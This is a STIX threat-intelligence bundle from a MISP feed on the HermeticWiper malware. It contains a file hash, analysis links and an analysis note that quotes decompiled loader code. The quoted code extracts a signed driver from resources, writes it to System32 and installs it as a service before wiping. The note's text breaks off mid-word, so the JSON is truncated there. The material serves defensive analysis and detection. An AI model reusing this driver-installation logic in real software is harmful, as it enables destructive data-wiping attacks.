adulau/misp-circl-feed
1
0
Fork 0
Code Issues 1 Pull requests Projects 1 Releases Packages Wiki Activity Actions
misp-circl-feed/feeds/circl/misp/a097dd7c-8e29-40eb-a70d-1fb0b5cca689.json

181 lines
18 KiB
JSON
Raw Normal View History

chg: [feed] added
2023-04-21 13:25:09 +00:00
{
chg: [feed] feed updated
2023-06-14 17:31:25 +00:00
"type": "bundle",
"id": "bundle--a097dd7c-8e29-40eb-a70d-1fb0b5cca689",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--5a313608-0410-4941-aaeb-8607950d210f",
"created": "2022-02-25T17:23:53.000Z",
"modified": "2022-02-25T17:23:53.000Z",
"name": "SCTIF",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--a097dd7c-8e29-40eb-a70d-1fb0b5cca689",
"created_by_ref": "identity--5a313608-0410-4941-aaeb-8607950d210f",
"created": "2022-02-25T17:23:53.000Z",
"modified": "2022-02-25T17:23:53.000Z",
"name": "HermeticWiper",
"published": "2022-02-25T17:24:03Z",
"object_refs": [
"indicator--90aef5c5-492d-4c84-adf8-60ff214a17c3",
"indicator--4cab8881-9318-4c40-a420-c4dd2bfbddf9",
"indicator--215a5737-73a1-41e3-a4b8-c122377ad081",
"indicator--a78adcbb-87ac-4942-8fa3-e5b85bac51e0",
"observed-data--260ee63c-ea28-4ba1-97bf-258b432fb758",
"url--260ee63c-ea28-4ba1-97bf-258b432fb758",
"note--11fd8080-ebcc-4347-bc28-c49087bf4ab5"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--90aef5c5-492d-4c84-adf8-60ff214a17c3",
"created_by_ref": "identity--5a313608-0410-4941-aaeb-8607950d210f",
"created": "2022-02-25T17:19:17.000Z",
"modified": "2022-02-25T17:19:17.000Z",
"pattern": "[file:hashes.SHA256 = '1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-02-25T17:19:17Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--4cab8881-9318-4c40-a420-c4dd2bfbddf9",
"created_by_ref": "identity--5a313608-0410-4941-aaeb-8607950d210f",
"created": "2022-02-25T17:23:00.000Z",
"modified": "2022-02-25T17:23:00.000Z",
"pattern": "[url:value = 'https://twitter.com/Sebdraven/status/1496796936698884097?']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-02-25T17:23:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "External analysis"
}
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--215a5737-73a1-41e3-a4b8-c122377ad081",
"created_by_ref": "identity--5a313608-0410-4941-aaeb-8607950d210f",
"created": "2022-02-25T17:23:08.000Z",
"modified": "2022-02-25T17:23:08.000Z",
"pattern": "[url:value = 'https://twitter.com/0xthreatintel/status/1497192937406754818?t=GYbB_9wJzaZXcTLcXTbgww&s=19']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-02-25T17:23:08Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "External analysis"
}
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--a78adcbb-87ac-4942-8fa3-e5b85bac51e0",
"created_by_ref": "identity--5a313608-0410-4941-aaeb-8607950d210f",
"created": "2022-02-25T17:23:21.000Z",
"modified": "2022-02-25T17:23:21.000Z",
"pattern": "[url:value = 'https://analyze.intezer.com/analyses/fc5894d6-bbf0-419d-b670-0de2ac345fc5']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-02-25T17:23:21Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "External analysis"
}
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--260ee63c-ea28-4ba1-97bf-258b432fb758",
"created_by_ref": "identity--5a313608-0410-4941-aaeb-8607950d210f",
"created": "2022-02-25T17:22:28.000Z",
"modified": "2022-02-25T17:22:28.000Z",
"first_observed": "2022-02-25T17:22:28Z",
"last_observed": "2022-02-25T17:22:28Z",
"number_observed": 1,
"object_refs": [
"url--260ee63c-ea28-4ba1-97bf-258b432fb758"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--260ee63c-ea28-4ba1-97bf-258b432fb758",
"value": "https://www.virustotal.com/gui/file/1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
},
{
"type": "note",
"spec_version": "2.1",
"id": "note--11fd8080-ebcc-4347-bc28-c49087bf4ab5",
"created_by_ref": "identity--5a313608-0410-4941-aaeb-8607950d210f",
"created": "2022-02-25T17:16:01.000Z",
"modified": "2022-02-25T17:16:01.000Z",
"abstract": "Analyze",
"content": "# Analyse HermeticWiper\r\n\r\n## Summary\r\n\r\nThis wiper is composed of two parts:\r\n\r\n* a loader signed that setups the driver and configuration to execute the wiper\r\n* a [driver](https://www.fichier.net/processus/epmntdrv.sys.html) signed. It is a legitim sofware to erase the data\r\n\r\nThe loader executes the wiping using IOCTLs code to send orders to the driver.\r\n\r\n## Using Driver\r\n\r\nDriver is stored in 'RCDATA' ressources, in PE. And unzipped to store in System32 in function 004029d0. (TIP: find \"RCDATA\" in strings)\r\n\r\n```c\r\nhResInfo = FindResourceW(DAT_00407380,lpName,L\"RCDATA\");\r\nif (((hResInfo != (HRSRC)0x0) &&\r\n (hResData = LoadResource(DAT_00407380,hResInfo), hResData != (HGLOBAL)0x0)) &&\r\n (local_18 = LockResource(hResData), local_18 != (LPVOID)0x0)) {\r\nlocal_1c = (HKEY)SizeofResource(DAT_00407380,hResInfo);\r\n\r\n```\r\n\r\n## Unzip the driver\r\n\r\nThis ressource is unzipped and the driver is written in system32 folder.\r\n\r\n```c\r\n hfSource = LZOpenFileW(path_of_driver,&local_414,2);\r\n if (-1 < hfSource) {\r\n PathAddExtensionW(local_38c,L\".sys\");\r\n local_18 = (LPCVOID)LZOpenFileW(path_of_driver,&local_49c,0x1002);\r\n if ((int)local_18 < 0) {\r\n LZClose(hfSource);\r\n }\r\n else {\r\n LVar11 = LZCopy(hfSource,(INT)local_18);\r\n LZClose(hfSource);\r\n LZClose((INT)local_18);\r\n if (0 < LVar11) {\r\n pWVar12 = path_of_driver;\r\n if (local_20 != 0) {\r\n pWVar12 = StrStrIW(path_of_driver,L\"System32\");\r\n }\r\n local_28 = setup_service(pWVar12,local_6a4);\r\n```\r\n\r\n## Install Driver\r\n\r\nthe service is created and started in function 00403930 with OpenSCManagerW\r\n\r\n```c\r\n hSCManager = OpenSCManagerW((LPCWSTR)0x0,L\"ServicesActive\",3);\r\n if (hSCManager == (SC_HANDLE)0x0) {\r\n DVar6 = GetLastError();\r\n SetLastError(DVar6);\r\n return 0;\r\n }\r\n hService = OpenServiceW(hSCManager,service_name,0x16);\r\n if (hService == (SC_HANDLE)0x0) {\r\n DVar6 = GetLastError();\r\n pcVar5 = CloseServiceHandle_exref;\r\n if (DVar6 != 0x424) goto LAB_00403a52;\r\n hService = CreateServiceW(hSCManager,service_name,service_name,0xf01ff,1,3,1,l_path_drive,\r\n (LPCWSTR)0x0,(LPDWORD)0x0,(LPCWSTR)0x0,(LPCWSTR)0x0,(LPCWSTR)0x0);\r\n if (hService == (SC_HANDLE)0x0) {\r\n DVar6 = GetLastError();\r\n pcVar5 = CloseServiceHandle_exref;\r\n goto LAB_00403a52;\r\n }\r\n local_14 = 1;\r\n }\r\n else {\r\n local_1c = 0;\r\n local_34 = ZEXT816(0);\r\n local_24 = 0;\r\n BVar2 = QueryServiceStatus(hService,(LPSERVICE_STATUS)local_34);\r\n if (BVar2 == 0) {\r\n BVar2 = ChangeServiceConfigW\r\n (hService,1,3,1,l_path_drive,(LPCWSTR)0x0,(LPDWORD)0x0,(LPCWSTR)0x0,\r\n (LPCWSTR)0x0,(LPCWSTR)0x0,(LPCWSTR)0x0);\r\n if (BVar2 == 0) {\r\n DVar6 = GetLastError();\r\n pcVar5 = CloseServiceHandle_exref;\r\n CloseServiceHandle(hService);\r\n goto LAB_00403a52;\r\n }\r\n }\r\n else {\r\n uVar3 = (uint)(local_34._4_4_ == 4);\r\n }\r\n }\r\n uVar4 = 0;\r\n do {\r\n if (uVar3 != 0) break;\r\n uVar3 = StartServiceW(hService,0,(LPCWSTR *)0x0);\r\n Sleep(1000);\r\n uVar4 = uVar4 + 1;\r\n } while (uVar4 < 5);\r\n DVar6 = 0;\r\n if (uVar3 == 0) {\r\n DVar6 = GetLastError();\r\n pcVar5 = CloseServiceHandle_exref;\r\n if (DVar6 == 0x420) {\r\n uVar3 = 1;\r\n CloseServiceHandle(hService);\r\n goto LAB_00403a52;\r\n }\r\n if (local_14 != 0) {\r\n DeleteService(hService);\r\n }\r\n```\r\n\r\n## Crypto Stuff\r\n\r\nThe loader generates an random number to use to wipe in function: 00401590\r\n\r\n```c\r\n success = CryptAcquireContextW\r\n ((HCRYPTPROV *)&PROV_RSA_FULL,(LPCWSTR)0x0,(LPCWSTR)0x0,1,0xf0000040);\r\n if (success != 0) {\r\n succe
"object_refs": [
"report--a097dd7c-8e29-40eb-a70d-1fb0b5cca689"
]
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
chg: [feed] added
2023-04-21 13:25:09 +00:00
]
}
Reference in a new issue Copy permalink